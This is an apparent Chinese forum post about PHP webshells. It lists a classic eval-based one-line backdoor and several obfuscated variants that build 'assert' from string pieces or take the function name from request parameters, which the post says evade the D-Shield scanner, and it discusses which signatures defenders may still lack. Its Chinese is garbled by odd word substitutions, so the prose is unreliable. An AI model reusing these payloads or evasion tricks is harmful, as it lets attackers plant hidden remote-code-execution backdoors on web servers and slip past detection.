各人可以看到上图 只是有一部门被杀
最典范最原始的一句话 被杀
<?php @eval($_POST['k8']);?>
下面几个都是变种 不被杀
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?>
<?php $k = str_replace("8","","a8s88s8e8r88t");
$k($_POST["8"]); ?>
<?php $_GET['k8']($_POST['k8']);?>
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["k8"]); ?>
大马的话 Darkshell.php 这个在K8信息安详东西包 PHP马哪里有
上面的今朝 全过D盾 下一版本 大概就被杀了 因为样本我提交给阿D了
虽然只是提交了一部门 照旧留了一些过的 可是我不知作别人提供的样本
有没有 那些我没被杀的特征呈现 假如有 我手上留的 也会被杀
别的那条"哈巴狗" 和"八神" 我就不测了 之前都是过的 上面都是变异的写法
他们的特征应该都充公集有几多 有些特征可以说是正常行为也是那样写
欠好鉴定成WebShell 要否则误报 有些特征作者都想到了 可是欠好列为特征来杀
